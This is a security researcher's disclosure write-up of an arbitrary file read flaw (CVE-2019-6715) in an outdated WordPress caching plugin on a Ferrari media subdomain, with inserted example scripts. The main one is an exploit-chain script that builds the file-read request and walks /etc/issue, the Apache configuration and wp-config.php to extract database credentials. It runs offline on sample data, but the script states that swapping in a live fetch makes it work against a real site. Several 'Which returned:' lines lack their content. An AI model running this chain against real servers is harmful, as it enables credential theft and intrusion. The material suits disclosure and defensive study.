We don’t have a Ferrari, but we had their database credentials
Have you ever wondered what it feels like to own a Ferrari? We did. Not the car itself, but access to their database credentials.
Following Ferrari's Responsible Disclosure Program, Char49 discovered a vulnerability on the media.ferrari.com subdomain. The vulnerability affected a popular WordPress plugin, W3 Total Cache, and could have allowed an attacker to read arbitrary files on the web server.
W3 Total Cache is a popular plugin used by millions of WordPress sites worldwide to improve website performance. Because it is so widely installed, it is also a common target for attackers.
Once the reconnaissance phase had identified an outdated, vulnerable version of the W3 Total Cache plugin, our team set itself the goal of demonstrating the impact to Ferrari by capturing the database connection credentials. In this article we cover the journey towards that goal.
Reconnaissance
It didn't require much effort to understand that Ferrari was running WordPress, the popular free and open-source content management system (CMS), on their media.ferrari.com subdomain. Without resorting to more advanced fingerprinting techniques, inspecting the DOM (Document Object Model) with the Developer Tools provided by most modern browsers revealed that several resources were being loaded from the well-known wp-content directory, as highlighted in the figure below.
WPScan, the WordPress security scanner, is a well-known and helpful tool typically used during the reconnaissance phase to enumerate, among other things, installed plugins. This pointed us towards a vulnerable version of W3 Total Cache: v0.9.3.
If you check the W3 Total Cache change log, you'll immediately notice that the latest version (at the time of writing) is v2.3.1. This should give you a good idea of how outdated the plugin was. The change log is one of the places to see what has changed since v0.9.3, the installed version. Searching the page for occurrences of "security" is one way to look for possible vulnerability fixes, but there are several other techniques, such as Google dorking or checking the W3 Total Cache CVEs. A combination of these techniques led us to CVE-2019-6715: an unauthenticated arbitrary file read vulnerability present in W3 Total Cache versions before v0.9.4.
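The plugin enumeration WPScan performs here reduces, in its passive form, to fetching the plugin's readme.txt and reading its "Stable tag:" line, then comparing that version with the one that fixed the bug. The script below is an added example, not code from the original post or from WPScan: the readme text is constructed for the example (the real readme served by media.ferrari.com is not shown on the page), the readme path is the WordPress plugin packaging convention, and the fixed version, 0.9.4, comes from the public CVE entry ("before 0.9.4").

```python
"""Passive version fingerprint for W3 Total Cache and a check against the
CVE-2019-6715 fix. Added example; the readme below is constructed, not
captured from media.ferrari.com."""
import re
from typing import Optional, Tuple

# Plugin readme location is a WordPress packaging convention.
README_PATH = "/wp-content/plugins/w3-total-cache/readme.txt"
# First version no longer affected, per the public CVE-2019-6715 entry.
FIXED_VERSION = "0.9.4"

# Constructed sample of the readme header an enumerator parses.
SAMPLE_README = """=== W3 Total Cache ===
Contributors: fredericktownes
Tags: cache, performance
Requires at least: 2.8
Stable tag: 0.9.3

Easy Web Performance Optimization (WPO) using caching.
"""


def stable_tag(readme: str) -> Optional[str]:
    """Value of the 'Stable tag:' line, or None if the header is absent."""
    m = re.search(r"^\s*Stable tag:\s*(\S+)\s*$", readme, re.M | re.I)
    return m.group(1) if m else None


def parse_version(version: str) -> Optional[Tuple[int, ...]]:
    """'0.9.4.1' -> (0, 9, 4, 1). Tuples compare numerically, unlike
    strings ('0.9.10' < '0.9.4' as strings). Returns None for tags such
    as 'trunk', which cannot be placed on the version line."""
    try:
        return tuple(int(part) for part in version.strip().split("."))
    except ValueError:
        return None


def vulnerable_to_cve_2019_6715(version: str) -> Optional[bool]:
    """True/False for a numeric version, None when it cannot be parsed."""
    parsed = parse_version(version)
    return None if parsed is None else parsed < parse_version(FIXED_VERSION)


def assess(readme: str) -> dict:
    """Combine both steps into the verdict an enumerator would report."""
    tag = stable_tag(readme)
    return {"path": README_PATH, "version": tag,
            "vulnerable": None if tag is None else vulnerable_to_cve_2019_6715(tag)}


if __name__ == "__main__":
    print(assess(SAMPLE_README))
```

A "Stable tag" is only as reliable as the plugin's packaging: it can lag the code actually deployed or read "trunk", which is why the check returns None rather than guessing in that case and why a finding like this one is confirmed by exercising the bug rather than by the version string alone.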
Exploitation
To achieve our goal of exposing the database credentials, we were after wp-config.php, the WordPress file where the credentials are stored in plaintext (unencrypted). The location of this file in the file system depends on several factors; the operating system and the HTTP server serving the WordPress site are just two of them.
We already had a good idea of which operating system and HTTP server the server was running, based on the fingerprinting returned by WPScan, but we decided to double-check. To identify the operating system, we read the /etc/issue file, which confirmed it was an old version of Ubuntu released in April 2014, whose support was extended until April 2024.
Which returned:
Knowing what the operating system was, and with a hint that the HTTP server should be Apache, we looked for the main configuration file of the latter (/etc/apache2/apache2.conf on Ubuntu) in order to understand whether, and which, Virtual Hosts were available/enabled:
Based on the returned response, we figured out that virtual-host-specific configuration was being loaded from the Apache sites-enabled folder. The name of the Virtual Host configuration file itself was partly guesswork, based on our experience with Apache HTTP server Virtual Host configuration. The following cURL request gave us the DocumentRoot, the directory the WordPress files were being served from:
Which returned:
Now, with the path to the media.ferrari.com WordPress site, we just needed to read wp-config.php to get the database details and keys:
Below is a partial screenshot of the original wp-config.php file with sensitive data redacted:
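The chain above (read /etc/issue, read the Apache main config, guess the enabled virtual host, read wp-config.php under its DocumentRoot) can be driven by a small script rather than a series of hand-typed cURL requests. What follows is an added example, not Char49's code or the plugin's. The request body follows the public CVE-2019-6715 description (pub/sns.php fetches the SubscribeURL of a SubscriptionConfirmation message); the post does not show its requests, so the exact body is an assumption. Every file below is a constructed sample, not a response from media.ferrari.com, and the virtual host name and paths are invented for the example.

```python
"""Offline walk of the file-read chain. Added example; request shape is an
assumption from the CVE description and all file bodies are constructed."""
import json
import re
from typing import Callable, Dict, List, Optional

SNS_ENDPOINT = "/wp-content/plugins/w3-total-cache/pub/sns.php"


def build_file_read_request(host: str, path: str) -> dict:
    """POST that makes a vulnerable sns.php return a local file (assumed
    shape: file:// URL in SubscribeURL, per the CVE description)."""
    body = {"Type": "SubscriptionConfirmation", "SubscribeURL": "file://" + path}
    return {"method": "POST", "url": "https://" + host + SNS_ENDPOINT,
            "headers": {"Content-Type": "application/json"},
            "body": json.dumps(body)}


def os_from_issue(issue: str) -> str:
    """/etc/issue carries getty escapes (\\n, \\l); drop them."""
    return re.sub(r"\\.", "", issue).strip()


def include_patterns(apache_conf: str) -> List[str]:
    """Include/IncludeOptional targets, relative to ServerRoot."""
    return re.findall(r"^\s*Include(?:Optional)?\s+(\S+)", apache_conf, re.M)


def document_roots(vhost_conf: str) -> Dict[str, str]:
    """ServerName -> DocumentRoot for every <VirtualHost> block."""
    roots = {}
    for block in re.findall(r"<VirtualHost[^>]*>(.*?)</VirtualHost>", vhost_conf, re.S):
        name = re.search(r"^\s*ServerName\s+(\S+)", block, re.M)
        root = re.search(r"^\s*DocumentRoot\s+\"?([^\"\s]+)", block, re.M)
        if root:
            roots[name.group(1) if name else "_default_"] = root.group(1)
    return roots


def wp_config_defines(php: str) -> Dict[str, str]:
    """define('NAME', 'value') pairs; values containing quotes are skipped."""
    return dict(re.findall(
        r"define\(\s*['\"](\w+)['\"]\s*,\s*['\"]([^'\"]*)['\"]\s*\)", php))


def exploit_chain(fetch: Callable[[str], Optional[str]],
                  vhost_candidates: List[str]) -> dict:
    """fetch(path) returns a file body or None. Against a live target it
    would send build_file_read_request(); here it reads SAMPLE_FILES."""
    out = {"os": os_from_issue(fetch("/etc/issue") or "")}
    includes = include_patterns(fetch("/etc/apache2/apache2.conf") or "")
    # The main config only reveals the directory; the file name inside
    # sites-enabled has to be guessed, as it was in the post.
    site_globs = [p for p in includes if "sites-enabled" in p]
    sub = site_globs[0].rsplit("/", 1)[0] if site_globs else "sites-enabled"
    sites_dir = "/etc/apache2/" + sub
    for name in vhost_candidates:
        roots = document_roots(fetch(sites_dir + "/" + name) or "")
        if roots:
            out["vhosts"] = roots
            break
    else:
        return out
    for root in roots.values():
        # WordPress also accepts wp-config.php one level above DocumentRoot.
        parent = root.rsplit("/", 1)[0]
        for candidate in (root + "/wp-config.php", parent + "/wp-config.php"):
            defs = wp_config_defines(fetch(candidate) or "")
            if "DB_PASSWORD" in defs:
                out["wp_config"] = candidate
                out["db"] = {k: defs[k] for k in
                             ("DB_NAME", "DB_USER", "DB_PASSWORD", "DB_HOST") if k in defs}
                return out
    return out


# Constructed samples standing in for the files read in the post.
SAMPLE_FILES = {
    "/etc/issue": "Ubuntu 14.04.6 LTS \\n \\l\n",
    "/etc/apache2/apache2.conf": (
        'ServerRoot "/etc/apache2"\n'
        "Include ports.conf\n"
        "IncludeOptional conf-enabled/*.conf\n"
        "IncludeOptional sites-enabled/*.conf\n"),
    "/etc/apache2/sites-enabled/media.conf": (
        "<VirtualHost *:443>\n"
        "    ServerName media.example.com\n"
        "    DocumentRoot /var/www/media/htdocs\n"
        "</VirtualHost>\n"),
    "/var/www/media/wp-config.php": (
        "<?php\n"
        "define( 'DB_NAME', 'wp_media' );\n"
        "define( 'DB_USER', 'wp_media_user' );\n"
        "define( 'DB_PASSWORD', 'example-only' );\n"
        "define( 'DB_HOST', '10.0.0.5' );\n"
        "define( 'AUTH_KEY', 'put your unique phrase here' );\n"),
}

if __name__ == "__main__":
    print(json.dumps(exploit_chain(SAMPLE_FILES.get, ["000-default.conf", "media.conf"]), indent=2))
```

The sample deliberately places wp-config.php one directory above the DocumentRoot, a layout WordPress supports and one that a first read of DocumentRoot/wp-config.php would miss; the chain falls back to the parent directory before giving up. The `fetch` parameter is the only thing that changes between this offline run and a live one, where it would issue the POST built by `build_file_read_request` and return the response body.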
Ferrari was fast to solve this issue and very responsive showing that they care about security. “Thank you for your report, you have contributed to improving Ferrari's cyber security posture.”
They also acknowledged our work by adding us to their Wall of Fame.
It's worth noting that Ferrari patched their server by updating the plugin. This incident serves as a reminder to all website owners and administrators to remain vigilant when it comes to security.
Regular vulnerability assessments and penetration testing are essential for identifying and addressing security risks before they can be exploited by attackers. Additionally, keeping all software and plugins up to date with the latest security patches is critical for maintaining a secure website.